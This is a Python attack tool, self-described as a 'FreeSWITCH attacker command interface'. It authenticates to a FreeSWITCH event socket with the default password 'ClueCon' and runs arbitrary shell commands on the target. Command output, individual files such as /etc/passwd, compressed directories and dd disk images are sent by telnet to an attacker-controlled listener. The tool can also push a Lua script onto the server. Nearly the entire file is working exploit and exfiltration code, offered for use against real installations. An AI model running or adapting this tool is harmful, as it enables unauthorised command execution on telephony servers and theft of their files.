#!C:\Python25_32bit\python.exe # (c) 2010 Adam Pridgen adam@praetoriangrp.com, adam.pridgen@thecoverofnight.com # cmd_interface.py: # FreeSWITCH attacker command interface. Provides a basic interface to a # FreeSWITCH installation with a default password # # # GPLv3 License # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . from socket import socket from threading import Thread, Semaphore import sys from time import sleep from binascii import unhexlify host = "TARGET_HOST_HERE" myaddr = "YOUR_HOST_HERE" iport = 1225 oport = 8021 DATA_LOCK = Semaphore(1) DATA = "" ACCEPT = False FILE_RECVD = True LARGE_FILE_SCRIPT = "dd_remote.lua" LARGE_FILE_DST = "/opt/dd_remote.lua" def get_data(): global DATA, DATA_LOCK DATA_LOCK.acquire() d = DATA DATA = "" DATA_LOCK.release() return d def set_data(val=""): global DATA, DATA_LOCK DATA_LOCK.acquire() DATA = val DATA_LOCK.release() def append_data(val): global DATA, DATA_LOCK DATA_LOCK.acquire() DATA += val data = DATA DATA_LOCK.release() return data def push_file(sock, sfilename, dfilename): echo_cmd = 'echo "%s" >> %s' sys.stdout.write("Copying %s to %s on the remote server\n"%(sfilename, dfilename)) f = open(sfilename).readlines() preprocess = [] for i in f: preprocess.append(i.replace('"', "'").strip()) for i in preprocess: if len(i) > 1000: sys.stdout.write("Sending Lots of data!\n") r = [i[j:j+1000] for j in xrange(0, len(i), 1000)] data_sent = 0; for k in r: cmd = echo_cmd%(k, dfilename) send_raw_command(sock, cmd) data_sent += len(k) sys.stdout.write("Progress: Sent %d bytes for a total of %d\n"%(len(k), data_sent)) else: cmd = echo_cmd%(i, dfilename) send_raw_command(sock, cmd) sys.stdout.write("Done sending the script to the remote file!\n") def listen_for_data(in_): global ACCEPT, FILE_RECVD ACCEPT = True while ACCEPT: d = read_all(in_) t = append_data(d) if FILE_RECVD == False: FILE_RECVD = True sys.stdout.write("Recieved %u bytes of data."%(len(d))) else: sys.stdout.write(t) def read_all(in_): sock,a = in_.accept() temp = None data = '' while temp != '': temp = sock.recv(1024) if temp == '': break data += temp return data def start_the_command_channel(host, port): free_switch_creds = "auth ClueCon" s = socket() s.connect((host, port)) s.send(free_switch_creds+'\x0a\x0a') return s def send_raw_command(sock, cmd): set_data() _cmd = 'api system %s \x0a\x0a'%(cmd) sock.send(_cmd) def send_command(sock, cmd, host, iport=23): set_data() _cmd = 'api system %s 2>&1| telnet %s %d\x0a\x0a'%(cmd,host, iport) set_data() sock.send(_cmd) def send_command(sock, cmd, host, iport=23): set_data() _cmd = 'api system %s 2>&1| telnet %s %d\x0a\x0a'%(cmd,host, iport) sock.send(_cmd) def start_the_sink_channel(host, port): s = socket() s.bind((host, port)) s.listen(5) return s def get_file(sock, sfile, dfile, myaddr, iport): global FILE_RECVD user_cmd = "cat %s "%(sfile) FILE_RECVD = False set_data() send_command(sock, user_cmd, myaddr, iport) while not FILE_RECVD: sleep(1) try: f = open(dfile, 'wb') f.write(get_data()) f.close() sys.stdout.write("Successfully wrote: %s"%dfile) except: sys.stdout.write("Ooops! something went wrong and the file was not written.") sys.stdout.write(sys.exc_info()[0]) def get_dir(sock, sdir, dfile, myaddr, iport): global FILE_RECVD user_cmd = "tar -czf --recursion - %s"%(sdir) FILE_RECVD = False set_data() send_command(sock, user_cmd, myaddr, iport) while not FILE_RECVD: sleep(1) try: f = open(dfile, 'wb') f.write(get_data()) f.close() sys.stdout.write("Successfully wrote: %s"%dfile) except: sys.stdout.write("Ooops! something went wrong and the file was not written.") sys.stdout.write(sys.exc_info()[0]) def rcmd_write(sock, rcmd, dfile): global FILE_RECVD FILE_RECVD = False set_data() send_raw_command(sock, rcmd) while not FILE_RECVD: sleep(1) try: f = open(dfile, 'wb') f.write(get_data()) f.close() sys.stdout.write("Successfully wrote: %s"%dfile) except: sys.stdout.write("Ooops! something went wrong and the file was not written.") sys.stdout.write(sys.exc_info()[0]) def pull_hex_file(sock, sfile, dfile, myaddr, iport): global FILE_RECVD FILE_RECVD = False set_data() user_cmd = "cat %s "%(sfile) send_command(sock, user_cmd, myaddr, iport) while not FILE_RECVD: sleep(1) try: d = unhexlify(get_data()) f = open(dfile, 'wb') f.write(d) f.close() sys.stdout.write("Successfully wrote: %s"%dfile) except: sys.stdout.write("Ooops! something went wrong and the file was not written.") sys.stdout.write(sys.exc_info()[0]) def get_large_file(sock, sfile, tfile, fsize, host, port, end): global FILE_RECVD, LARGE_FILE_SCRIPT, LARGE_FILE_DST, iport, myaddr sys.stdout.write("Removing %s from the remote system.\n"%(LARGE_FILE_DST)) send_command(sock,"rm %s"%(LARGE_FILE_DST), myaddr, iport) sleep(1) push_file(sock, LARGE_FILE_SCRIPT, LARGE_FILE_DST) send_command(sock,"chmod a+x %s"%(LARGE_FILE_DST), myaddr, iport) user_cmd = "%s %s %s %s %s %d %s &"%(LARGE_FILE_DST, sfile, tfile, fsize, host, int(port), end) FILE_RECVD = False set_data() sys.stdout.write("Sending the following command:\n%s\n"%(user_cmd)) send_raw_command(sock, user_cmd) sys.stdout.write("Monitor the destination of the image for action.\n") CMD_MENU = """Enter a command: 1) (C) execute a command e.g. C ls -all 2) (F) pull down a file e.g. F /etc/passwd C:\Users\you\passwd 3) (D) pull down a tgz compressed directory e.g. D /etc/ C:\Users\you\etc.tgz 4) (R) enter a raw command e.g. system ls -all | telnet 192.168.35.14 1224 5) (W) enter a raw command e.g. system ls -all | telnet 192.168.35.14 1224 6) (L) push lua file to the host 7) (P) pull down hexadecimal file,, convert to binary 8) (G) pull back a dd image. src_file tempfile filesz tailvalue host port 8) (*) reset the connection 8) (Q) quit """ out_ = start_the_command_channel(host, oport) in_ = start_the_sink_channel("", iport) t = Thread(target=listen_for_data, args=(in_,)) t.start() if __name__ == "__main__": sys.stdout.write(CMD_MENU) while True: try: sys.stdout.write(">>>") cmd = sys.stdin.readline().strip() cmd_list = cmd.split() if cmd== "" : sys.stdout.write("Incorrect command!\n\n\n") continue elif cmd_list[0].upper() == "Q": #in_.shutdown(0) in_.close() ACCEPT = False break elif cmd_list[0].upper() == "*": out_ = start_the_command_channel(host, oport) sys.stdout.write("Connection reset and restablisehd") continue elif cmd_list[0].upper() == "M": sys.stdout.write(CMD_MENU) continue elif len(cmd_list) < 2: sys.stdout.write("Incorrect command!\n\n\n") sys.stdout.write(CMD_MENU) continue if cmd_list[0].upper() == "C": send_command(out_, " ".join(cmd_list[1:]), myaddr, iport) sleep(1) elif cmd_list[0].upper() == "R": send_raw_command(out_, " ".join(cmd_list[1:])) sleep(1) elif cmd_list[0].upper() == "F" and len(cmd_list) == 3: filename = cmd_list[1] saveas = cmd_list[2] get_file(out_, filename, saveas, myaddr, iport) elif cmd_list[0].upper() == "D" and len(cmd_list) == 3: filename = cmd_list[1] saveas = cmd_list[2] get_dir(out_, filename, saveas, myaddr, iport) elif cmd_list[0].upper() == "W" and len(cmd_list) > 2 : raw_cmd = " ".join(cmd_list[2:]) saveas = cmd_list[1] rcmd_write(out_, raw_cmd, saveas) elif cmd_list[0].upper() == "L" and len(cmd_list) > 2 : sfilename = cmd_list[1] saveas = cmd_list[2] push_file(out_, sfilename, saveas) elif cmd_list[0].upper() == "P" and len(cmd_list) > 2 : sfilename = cmd_list[1] saveas = cmd_list[2] pull_hex_file(out_, sfilename, saveas, myaddr, iport) elif cmd_list[0].upper() == "G" and len(cmd_list) > 2 : sfilename = cmd_list[1] tempfile = cmd_list[2] filesz = cmd_list[3] tailvalue = cmd_list[4] host = cmd_list[5] port = cmd_list[6] get_large_file(out_, sfilename, tempfile, filesz, host, port, tailvalue) else: sys.stdout.write("Incorrect command!\n\n\n") sys.stdout.write(CMD_MENU) continue sys.stdout.write("\n\n") except KeyboardInterrupt: ACCEPT = False #in_.shutdown(0) in_.close() break print "Thanks for using the free switch 0wn3rz client...You need to close the window now"